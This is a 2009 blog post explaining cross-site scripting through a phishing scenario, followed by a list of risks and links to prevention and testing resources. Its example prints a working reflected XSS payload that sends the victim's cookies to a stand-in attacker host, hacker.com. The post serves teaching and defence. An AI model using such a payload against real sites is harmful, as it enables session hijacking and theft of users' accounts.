Thursday, August 6, 2009

Cross Site Scripting

Go to main post


Cross Site Scripting (XSS)

Cross Site Scripting(XSS) is a flaw in a website that allows an attacker to insert malicious content onto the page returned from the web server. This is typically accomplished by constructing a URL that points to the target website (one that is vulnerable to cross-site scripting). The malicious link is designed to inject malicious commands or HTML that will be redirected back to the person clicking the link. The attacker then attempts to get a victim to click the link.

Let’s look at a phishing attack. A hacker, posing as the administrator of a popular site, sends you an email asking you to click on a link for some fictitious reason. The link is to a page with a cross-site scripting vulnerability. The page takes the name of a product as a parameter, and if the product is not found it returns back an error message saying that the product is not found:

https://www.fakesite.com/products.php?product_name=cellphone

This URL returns the following simplified HTML. Note the product name is sent back in the HTML:

<html><body>Could not find the product cellphone</body></html>

The attacker sends you a link instead that looks like this:

http://www.fakesite.com/products.php?product_name=<script>document
.location='http://www.hacker.com/cgi-bin/cookie.cgi?'%20+document
.cookie</script>

This URL returns the following HTML:

<html><body>Could not find the product
<script>document.location='http://www.hacker.com/cgi-bin/cookie
.cgi?'%20+document.cookie</script></body></html>

When a user clicks the link, it will open the target website and run the JavaScript in the victim’s browser causing the victim’s cookies to be sent to the attacker’s website.

At the other end, the hacker is waiting for these cookies to come across and then use them to login into the target website as the victim. [Source]


Cross-Site Scripting poses server application risks that include, but are not limited to, the following:

  • Users can unknowingly execute malicious scripts when viewing dynamically generated pages based on content provided by an attacker.

  • An attacker can take over the user session before the user's session cookie expires.

  • An attacker can connect users to a malicious server of the attacker's choice.

  • An attacker who can convince a user to access a URL supplied by the attacker could cause script or HTML of the attacker's choice to be executed in the user's browser. Using this technique, an attacker can take actions with the privileges of the user who accessed the URL, such as issuing queries on the underlying SQL databases and viewing the results and to exploit the known faulty implementations on the target system. [Source]



  • More on XSS (Cross Site Scripting)

    1. XSS (Cross Site Scripting) Prevention Cheat Sheet - XSS Prevention Rules etc

    2. Below link contains FAQs about Cross Site Scripting like What is Cross Site Scripting?, What are the threats of Cross Site Scripting?, How common are CSS/XSS holes?, What can I do to protect myself as a user? etc
    cgisecurity

    3. The Anatomy of Cross Site Scripting: Anatomy, Discovery, Attack, Exploitation
    net-security.org

    4. Full explanation – the cross-site scripting technique, its Scope and feasibility, ways to perform (traditional) CSS attacks, Securing a site against CSS attacks, How to check if your site is protected from CSS etc.
    XSS.pdf

    5. Fun Cross Site Scripting Example

    6. Below link includes - What is Cross Site Scripting?, The repercussions of XSS, A practical example of XSS on a test site etc.
    windowsecurity

    7. XSS (Cross Site Scripting) Cheat Sheet
    Esp: for filter evasion

    8. Includes Description of Cross-site scripting Vulnerabilities, How to Avoid Cross-site scripting Vulnerabilities, How to Review Code for Cross-site scripting Vulnerabilities
    Testing for Cross site scripting

    9. Below link shows how you can help protect your ASP.NET applications from cross-site scripting attacks by using proper input validation techniques and by encoding the output.
    How To: Prevent Cross-Site Scripting in ASP.NET

    10. Google XSS Vulnerability - The recent cross-site scripting (XSS) vulnerability discovered in Google perfectly illustrates why character encoding matters

    11. Cross-site scripting: are your web applications vulnerable? - Includes Introduction to Cross-site scripting, an advanced cross-site scripting attack, Prevention etc (Please look under White Papers)

    12. Cross Site Scripting - Understanding the vulnerability and payload


    Also See:

    Cookie Testing
    SQL Injection